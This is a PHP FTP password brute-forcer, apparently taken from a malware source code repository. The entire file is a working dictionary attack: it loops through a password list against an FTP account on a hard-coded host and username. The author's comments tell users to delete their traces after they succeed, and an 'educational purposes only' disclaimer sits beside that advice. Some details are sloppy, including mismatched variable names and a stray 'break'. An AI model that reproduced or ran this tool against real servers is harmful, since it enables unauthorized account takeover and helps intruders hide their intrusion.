MalwareSourceCode/PHP/HackTool.PHP.BruteForce.c7

82 lines
2.9 KiB
Plaintext
Raw Permalink Normal View History

2020-10-10 03:05:41 +00:00
<?php
/*
* This simple FTp brute forcer script is coded by
* ^cybergang007^. I am in no way responsible for
* any serious job you do with this piece of code.
* Intended for educational purposes only.
*
* This bad script probes an FTP dictionary attack
*
* @Email : <soteres2002@greeknetizen.net>
* @URL : http://www.greeknetizen.net/
* @DESCTIPTION:
* This PHP script tries a password
* from the password file each time intil it finds it.
* Execute it from a webpage on your server, not from
* the command line(!). And remember to clear your
* traces if you succeed in cracking the password
* of the FTP account you desire. And once again,
* I am not responsible for any of your actions
* with this code.
*/
error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
set_time_limit(0); // set the time limit for the script to +oo
$passwordfile = "passwd.dic"; //this is the path to the passwordfile
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
$usrname = "bahoosh"; // change this to the username
// of the FTP account you want
// to attack
$interval = 1; // this is the break the script each time it tries a password
// do not set this to zero
//change the second arguments you desire
$crh = "Sorry, the host you specified cannot be retrieved!";
$cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with <b>$username</b> and password: $trypassword</font><br>";
/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */
if(!file_exists($passwordfile)) {
die("Sorry, the passwordfile <b>$passwordfile</b> cannot be retrieved");
} else {
// open connection funtion
function openconnection($targethost,$username,$trypassword) {
print "<hr>Trying password <b>$trypassword</b> for <b>".$username."</b> to $targethost<hr><br>";
$ftp_conn = @ftp_connect($targethost) or print $crh;
if($ftp_conn) {
$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
if(!$trylogin) {
print $cc;
} else {
print "<b><font color=\"red\">The password is: $trypassword</font></b><br>";
@ftp_quit($ftp_conn);
break;
}
}
}
//end of function
// try to open the password file
$fp = @fopen($passwordfile,"r");
if(!$fp) {
die("The password file cannot open");
} else {
print "<b>The passwordfile is forked!</b>";
//get the passwords
while($trypassword = @fgets($fp,1024)) {
openconnection($targethost,$usrname,$trypassword);
sleep($interval);
}
}
//...and close the password file or die of errors
@fclose($fp) or die("\n<br>\nCannot close the password file!\n");
echo "<b>The password file has closed";
}
// when you succeed connecting to your victim's server
// do not forget to delete your traces
?>